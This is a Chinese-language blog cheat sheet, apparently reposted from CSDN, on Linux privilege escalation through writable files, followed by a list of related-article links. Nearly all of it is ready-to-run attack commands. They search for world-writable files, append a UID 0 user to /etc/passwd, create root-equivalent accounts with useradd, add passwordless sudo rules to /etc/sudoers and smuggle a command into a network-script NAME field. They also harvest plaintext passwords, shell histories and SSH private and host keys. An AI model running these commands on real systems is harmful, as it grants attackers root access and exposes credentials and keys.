当前位置: 首页 > article >正文

WEB渗透Linux提权篇-可写文件提权

往期文章

WEB渗透Linux提权篇-环境变量提权-CSDN博客

WEB渗透Linux提权篇-提权工具合集-CSDN博客

 

用到的工具:windows、Linux、Mac提权脚本整理:夸克网盘分享 

 

列出系统中可写文件
>find / -writable ! -user `whoami` -type f ! -path "/proc/*" ! -path "/sys/*" -exec ls -al {} \; 2>/dev/null
>find / -perm -2 -type f 2>/dev/null
>find / ! -path "*/proc/*" -perm -2 -type f -print 2>/dev/null
passwd文件
$ls –lh /etc/passwd 若是任何用户可读写
$perl -le 'print crypt("password@123","addedsalt")' 生成密码或php -r "print(crypt('aarti','123') . \"\n\");"或python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'
$echo "test:advwtv/9yU5yQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd
一条命令添加root用户
>useradd -p `openssl passwd -1 -salt 'user' 123qwe` -u 0 -o -g root  -G root -s /bin/bash -d /home/user venus
用户名venus 密码123qwe
>useradd newuser;echo "newuser:password"|chpasswd
>echo "admin:x:0:0::/:/bin/sh" >> /etc/passwd
>passwd admin修改密码
或
>useradd newuser;echo "newuser:password"|chpasswd
>useradd -p `openssl passwd 123456` guest
>useradd -p "$(openssl passwd 123456)" guest
>useradd newuwer;echo -e "123456\n123456\n" |passwd newuser
/etc/sysconfig/network-scripts/
NAME=Network /bin/id  <= 注意空格
ONBOOT=yes
DEVICE=eth0

EXEC :
./etc/sysconfig/network-scripts/ifcfg-1337
sudoers
echo "username ALL=(ALL:ALL) ALL">>/etc/sudoers

无需密码使用sudo
echo "username ALL=(ALL) NOPASSWD: ALL" >>/etc/sudoers
echo "username ALL=NOPASSWD: /bin/bash" >>/etc/sudoers
查找纯文本用户名和密码
>grep -i user [filename]
>grep -i pass [filename]
>grep -C 5 "password" [filename]
>find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password"   # Joomla
>cat ~/.bash_history
>cat ~/.nano_history
>cat ~/.atftp_history
>cat ~/.mysql_history
>cat ~/.php_history
>grep --color=auto -rnw '/' -ie "PASSWORD" --color=always 2> /dev/null
>find . -type f -exec grep -i -I "PASSWORD" {} /dev/null \;
尝试查找私钥
>cat ~/.ssh/authorized_keys
>cat ~/.ssh/identity.pub
>cat ~/.ssh/identity
>cat ~/.ssh/id_rsa.pub
>cat ~/.ssh/id_rsa
>cat ~/.ssh/id_dsa.pub
>cat ~/.ssh/id_dsa
>cat /etc/ssh/ssh_config
>cat /etc/ssh/sshd_config
>cat /etc/ssh/ssh_host_dsa_key.pub
>cat /etc/ssh/ssh_host_dsa_key
>cat /etc/ssh/ssh_host_rsa_key.pub
>cat /etc/ssh/ssh_host_rsa_key
>cat /etc/ssh/ssh_host_key.pub
>cat /etc/ssh/ssh_host_key

http://www.kler.cn/a/291156.html

相关文章:

  • Qt按钮美化教程
  • 【Python】循环语句
  • Scala语言的循环实现
  • 大模型GUI系列论文阅读 DAY2续:《一个具备规划、长上下文理解和程序合成能力的真实世界Web代理》
  • IO进程----进程
  • 郑州大学2022级大三期末复习总结(数据库,传感器,嵌入式,人工智能,移动终端开发,计算机英语)
  • 集成电路学习:什么是MOSFET(MOS管)
  • 【kubernetes】污点配置、cm、secret练习
  • 数学基础 -- 线性代数之共轭转置矩阵
  • 体会循环---冒泡排序
  • 2024.9.4
  • 在js渲染的dom中的事件中传递对象
  • 米家商城主题 html 页面源码分享,可用于网页设计作业
  • 室内导航定位系统在医院的应用与部署
  • Kubernetes学习指南:保姆级实操手册05——配置集群HA负载均衡
  • 智能巡检机器人创新设计的关键技术
  • Xml 映射文件中常见的标签
  • python(进阶2)实现自动化注册和登录
  • 长芯微国产LS0102电平转换器/电平移位器P2P替代TXS0102
  • 支付宝线上小程序打开异常
  • VUE3+FLASK+TYPESCRIPT(实习接触,学习并自主实现)
  • 硬件-电源常识
  • Python作为客户端连接websocket
  • 10.2 TCP IP模型、IP协议、IPv4、子网掩码
  • SpringBoot3 项目部署
  • 【计算机毕业设计】微信小程序的美甲店铺座位预约系统